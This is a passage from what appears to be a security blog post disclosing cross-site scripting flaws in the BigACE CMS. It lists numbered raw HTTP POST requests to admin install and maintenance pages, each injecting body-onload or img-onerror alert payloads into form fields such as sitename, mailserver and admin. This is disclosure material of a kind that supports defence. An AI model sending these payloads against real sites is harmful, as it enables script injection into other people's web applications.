data%5Bnewdomain%5D=10.149.14.52&data%5Bsitename%5D='"%2f%2e%20%2f,alert(4321)%2f%2f#"%3eXXX&data%5Bmailserver%5D=asd&data%5Bdefault_editor%5D=fckeditor&data%5Bdefault_style%5D=standard&data%5Bdefault_lang%5D=en&data%5Bstatistics%5D=TRUE&data%5Badmin%5D=&data%5Bwebmastermail%5D=%40&data%5Bpassword%5D=&data%5Bcheck%5D=
---< request >---


29. xss
---< request >---
POST /bigace/public/index.php?cmd=admin&id=communityInstall_tADMIN_len&s4lkhkj5svr=gI8n3Els143 HTTP/1.1
Host: 10.149.14.52

data%5Bnewdomain%5D=10.149.14.52&data%5Bsitename%5D=asd&data%5Bmailserver%5D='%3e"%3e%3cbody%20onload%3dalert(%2f4321%2f)%3e&data%5Bdefault_editor%5D=fckeditor&data%5Bdefault_style%5D=standard&data%5Bdefault_lang%5D=en&data%5Bstatistics%5D=TRUE&data%5Badmin%5D=&data%5Bwebmastermail%5D=%40&data%5Bpassword%5D=&data%5Bcheck%5D=
---< request >---

30. xss
---< request >---
POST /bigace/public/index.php?cmd=admin&id=maintenance_tADMIN_len HTTP/1.1
Host: 10.149.14.52

s4lv09G4d=u5FN80Ky&zhtf5fikj=q39854ljh&jhgf854ih='%3e"%3e%3cimg%2fsrc%3d"x"%2fonerror%3d"alert(4321)"%3e
---< request >---


31. xss
---< request >---
POST /bigace/public/index.php?cmd=admin&id=communityInstall_tADMIN_len&s4lkhkj5svr=gI8n3Els143 HTTP/1.1
Host: 10.149.14.52

data%5Bnewdomain%5D=10.149.14.52&data%5Bsitename%5D=asd&data%5Bmailserver%5D=asd&data%5Bdefault_editor%5D=fckeditor&data%5Bdefault_style%5D=standard&data%5Bdefault_lang%5D=en&data%5Bstatistics%5D=TRUE&data%5Badmin%5D='%3e"%3e%3cimg%2fsrc%3d"x"%2fonerror%3d"alert(4321)"%3e&data%5Bwebmastermail%5D=%40&data%5Bpassword%5D=&data%5Bcheck%5D=
---< request >---

32. xss
---< request >---
POST /bigace/public/index.php?cmd=admin&id=communityInstall_tADMIN_len&s4lkhkj5svr=gI8n3Els143 HTTP/1.1
Host: 10.149.14.52

data%5Bnewdomain%5D=10.149.14.52&data%5Bsitename%5D=asd&data%5Bmailserver%5D=asd&data%5Bdefault_editor%5D=fckeditor&data%5Bdefault_style%5D=standard&data%5Bdefault_lang%5D=en&data%5Bstatistics%5D=TRUE&data%5Badmin%5D=&data%5Bwebmastermail%5D='%3e"%3e%3cbody%20onload%3dalert(%2f4321%2f)%3e&data%5Bpassword%5D=&data%5Bcheck%5D=
---< request >---

Cheers o/

Posted by at
Labels: , , , , , , ,

No comments:

Post a Comment

What do You think...?

Subscribe to: Post Comments (Atom)